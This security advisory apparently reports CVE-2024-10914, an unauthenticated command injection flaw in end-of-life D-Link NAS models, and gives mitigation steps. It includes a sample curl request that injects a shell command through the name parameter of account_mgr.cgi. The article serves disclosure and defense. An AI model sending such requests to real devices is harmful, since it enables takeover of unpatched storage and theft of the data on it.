Vulnerability

Overview 

A recently identified command injection vulnerability in D-Link network-attached storage (NAS) devices exposes over 61,000 internet-connected units to potential exploitation.  

The flaw, tracked as CVE-2024-10914, allows unauthenticated attackers to inject arbitrary commands by exploiting the name parameter in the cgi_user_add command. 

The vulnerability affects legacy D-Link NAS devices, primarily used by small businesses, and holds a critical CVSS score of 9.2, calling for an immediate need for mitigation. 

This vulnerability is especially concerning as D-Link has classified these devices as end-of-life (EOL) and end-of-service (EOS), meaning they will no longer receive security updates or patches. D-Link has recommended that users retire affected devices or, at minimum, isolate them from public internet access. 

Affected Devices and Vulnerability Scope 

The CVE-2024-10914 command injection vulnerability impacts several D-Link NAS models that are no longer supported. The affected devices include: 

  • DNS-320 – Version 1.00 

  • DNS-320LW – Version 1.01.0914.2012 

  • DNS-325 – Versions 1.01, 1.02 

  • DNS-340L – Version 1.08 

The vulnerability lies in the account_mgr.cgi script, specifically when processing the name parameter within the cgi_user_add command. Due to insufficient input sanitization, attackers can manipulate this parameter to execute arbitrary shell commands, potentially compromising all data on the device.  

According to a scan conducted on the FOFA platform by security researcher NetSecFish, more than 61,000 vulnerable devices are accessible from unique IP addresses globally, showcasing the extensive risk this flaw poses to users. 

Exploitation Details 

Exploiting CVE-2024-10914 requires minimal technical knowledge. Attackers can craft a simple HTTP GET request to the vulnerable device’s IP address, embedding malicious commands within the name parameter, as shown below: 

curl “http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27” 

The above command triggers the cgi_user_add function, injecting the shell command specified by the attacker, effectively granting unauthorized control over the device. This vulnerability (CWE-77) poses a severe risk, as command injection attacks can lead to complete device takeover, unauthorized access to stored data, and the potential for lateral movement within a network. 

D-Link’s Response and Recommendations 

D-Link released an advisory acknowledging the vulnerability and confirming that affected devices have reached end-of-life (EOL) status. As a result, they no longer receive firmware updates or security patches, meaning that no official fix will be provided.  

“If a product has reached the End of Support (“EOS”) or End of Life (“EOL”), it typically does not receive further extended support or development. Typically, D-Link cannot resolve device or firmware issues for these products since all development and customer support have ceased,” the company said. 

D-Link advises users to replace these NAS devices with more secure and supported models to mitigate the risk of exploitation. 

For users who cannot immediately retire these devices, D-Link has issued the following recommendations: 

  1. Isolate Vulnerable NAS Devices: Disconnect the affected NAS devices from the public internet to prevent external exploitation. 

  2. Restrict Access: Limit access to the device by configuring firewall rules or network access controls that restrict traffic to trusted internal networks only. 

  3. Update Access Credentials: Frequently update and strengthen device passwords to mitigate potential unauthorized access and ensure encryption is enabled for wireless connections. 

  4. Consider Third-Party Firmware: For advanced users, third-party firmware may provide additional security updates, though it voids any remaining warranty and is unsupported by D-Link. 

        Security Implications and Best Practices 

        With over 61,000 potentially exposed devices and no available patch, this vulnerability has significant implications. Organizations using these NAS devices to store or transfer sensitive information are advised to take immediate action to mitigate potential breaches

        Beyond D-Link’s recommendations, organizations can adopt additional best practices to minimize their exposure to this risk: 

        • Network Segmentation: Place vulnerable devices in segmented network zones to prevent attackers from moving laterally if they gain initial access. 

        • Regular Vulnerability Scanning: Implement frequent scanning to identify exposed or vulnerable devices within the network. 

        • Monitor Network Traffic: Set up network monitoring to detect unusual traffic patterns or access attempts, which could indicate exploitation. 

        • Cybersecurity Awareness: Inform employees and network administrators about this vulnerability to reinforce secure practices for managing NAS devices. 

        Conclusion 

        CVE-2024-10914 represents a critical risk to D-Link NAS device users, particularly as these devices will not receive security patches due to their EOL/EOS status. Immediate action is necessary to mitigate this risk, either by retiring affected devices or by enforcing strict access controls. For businesses and individuals relying on these legacy devices, upgrading to secure, supported hardware is the most effective solution to maintain data integrity and safeguard against potential threats. 

        References: 

        https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10413
        https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07

        The post No Fix for Critical Command Injection Vulnerability in Legacy D-Link NAS Devices   appeared first on Cyble.